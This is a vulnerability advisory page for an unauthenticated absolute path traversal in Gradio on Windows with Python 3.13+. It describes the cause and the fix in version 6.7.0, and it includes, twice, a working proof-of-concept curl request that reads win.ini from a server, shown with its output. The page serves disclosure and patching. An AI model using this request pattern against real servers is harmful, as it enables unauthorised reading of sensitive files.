Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.5
Gradio on Windows with Python 3.13+: Unauthenticated File Access
CVE-2026-28414
GHSA-39mp-8hj3-5c49
Summary
Gradio apps on Windows with Python 3.13+ can be hacked to access any file on the system without a password. This is a security risk because an attacker can read sensitive files. To protect your app, update to a version of Gradio that fixes this issue or use a different version of Python.
What to do
- Update gradio to version 6.7.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | gradio | <= 6.7.0 | 6.7.0 |
| gradio_project | gradio | <= 6.7.0 | – |
Original title
Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+
Original description
### Summary
Gradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.
### Details
Python 3.13+ changed the definition of `os.path.isabs` so that root-relative paths like `/windows/win.ini` on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio's logic for joining paths safely.
This can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.
### PoC
```
% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
### Impact
Arbitrary file read in the context of the Windows user running Gradio.
Gradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.
### Details
Python 3.13+ changed the definition of `os.path.isabs` so that root-relative paths like `/windows/win.ini` on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio's logic for joining paths safely.
This can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.
### PoC
```
% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
### Impact
Arbitrary file read in the context of the Windows user running Gradio.
nvd CVSS3.1
7.5
Vulnerability type
CWE-36
CWE-22
Path Traversal
Published: 1 Mar 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026